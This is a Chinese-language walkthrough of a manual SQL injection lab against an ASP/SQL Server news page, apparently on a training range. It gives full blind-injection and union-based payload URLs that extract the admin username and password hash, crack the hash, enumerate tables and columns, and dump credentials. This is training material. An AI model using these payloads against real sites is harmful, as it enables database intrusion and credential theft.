SQL手工注入漏洞测试(Sql Server数据库)

 

 

 

还是先找到注入点，然后order by找出字段数：4

通过SQL语句中and 1=2 union select 1,2,3……,n联合查询，判断显示的是哪些字段，就是原本显示标题和内容时候的查询字段。此处返回的是错误页面，说明系统禁止使用union进行相关SQL查询，我们得使用其他方式进行手工SQL注入。

一、盲注

盲猜爆出表名

 

通过SQL语句中的and exists(select username from manage)查询，判断manage数据库表表中存在的字段。此处返回内容为正常页面，说明数据库表中存在username字段。同理找出password字段

页面提交：http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)
数据库执行语句：select * from manage where id=2 and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)
页面返回描述：返回内容为正常页面
分析解说：通过SQL语句中的通过SQL语句中的and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)查询，判断manage数据库表表中id=1的username字段值的第一位字符。此处返回内容为正常页面，说明数据库表中ID=1的username字段值的第一位等于‘d’。

 

http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,3,1))=109 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,4,1))=105 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,5,1))=110 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,6,1))=95 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,7,1))=109 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,8,1))=122 and ID=1)
最后得到的username值是：admin_mz

 

 利用注入username字段值的方法对password字段进行注入，分别提交以下URL请求，即可得到id=1的password字段的值。
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,1,1))=55 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,2,1))=50 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,3,1))=101 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,4,1))=49 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,5,1))=98 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,6,1))=102 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,7,1))=99 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,8,1))=51 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,9,1))=102 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,10,1))=48 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,11,1))=49 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,12,1))=98 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,13,1))=55 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,14,1))=53 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,15,1))=56 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,16,1))=51 and ID=1)
最后得到的password值是：72e1bfc3f01b7583

通过MD5解密网站得知明文password值为97285101

 二、union all

http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,null,null,null

用union all select null,null,null,null四个null分别尝试回显位置，得到回显语句：

http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,2,null,null

//逐一测试，显示位3为字符型，导致的一些bug

http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,2,'3',null

 

数据库

//这里也可以使用db_name(1)、db_name(2)查询其他数据库

http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,db_name(),null,null

 

结果为：mozhe_db_v2

 

表

http://219.153.49.228:44082/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4

//xtype='u' :查看用户表

结果：manage

查看有没别的表

http://219.153.49.228:44082/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),'3',4

结果：announcement

继续查看表

id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage','announcement')),'3',4

结果空，说明没有别的了。

 

列名

id=-2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null

得出：id

id=-2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null

得出：username

id=-2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null

得出：password

id=-2 union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null

得出：空

说明mange表总共有3列，分别为：id、username、password

爆破：

http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,username, password ,null from manage